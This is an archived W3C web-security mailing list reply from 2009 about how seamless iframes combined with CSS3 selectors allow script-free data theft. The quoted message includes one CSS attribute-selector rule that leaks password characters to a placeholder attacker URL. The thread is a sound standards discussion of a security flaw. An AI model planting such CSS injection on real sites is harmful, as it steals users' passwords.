W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Adam Barth <w3c@adambarth.com>
Date: Sat, 5 Dec 2009 08:54:58 -0800
Message-ID: <7789133a0912050854x54cece78re21f6e31bb8a9b62@mail.gmail.com>
To: sird@rckc.at
Cc: public-web-security@w3.org
I see.  The issue is that the attacker can inject CSS + iframes, but
not script, into one page in an origin.  Now with seemless+CSS3, the
attacker can steal information from the entire origin.  Very cool!


On Fri, Dec 4, 2009 at 6:39 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
> I sincerely understand why people want seamless iframes on HTML5.. I mean,
> I've been there.. but sometimes the better way to do something is not to do
> it.
> The perfect example are seamless iframes (defined in html5) and CSS3
> selectors.
> I've showed (together with David Lindsay, and Gareth Heyes) expressed
> several times that we think this is a bad idea.
> We always receive the same answer "seamless iframes are same-origin!" and
> believe me, I know.. but guess what? javascript is also same origin.. and it
> also creates problems.
> What I see with those awesome CSS3 selectors such as:
> input[type=password][value^=a]{background:url("//attacker/password_starts_with=a")}
> create a new type of XSS attacks, and those are purely CSS based XSS
> attacks.. without JS.. that will allow an attacker to read arbitrary files
> from the page WITHOUT the need of JS.
> I really hope people in here know that a cool feature is sometimes not such
> a good idea, and hopefully, we can see how to resolve this issue..
> References: The Sexy Assassin - BlueHat 2008 Presentation http://p42.us/css/
> Favorite XSS - BlackHat 2009 Presentation http://p42.us/favxss/
> Stefano Di Paola PoC http://www.wisec.it/CssSteal/frame.html
> Greetings!!
> -- Eduardo
> http://www.sirdarckcat.net/
Received on Saturday, 5 December 2009 16:56:05 UTC

This archive was generated by hypermail 2.4.0 : Friday, 17 January 2020 18:09:23 UTC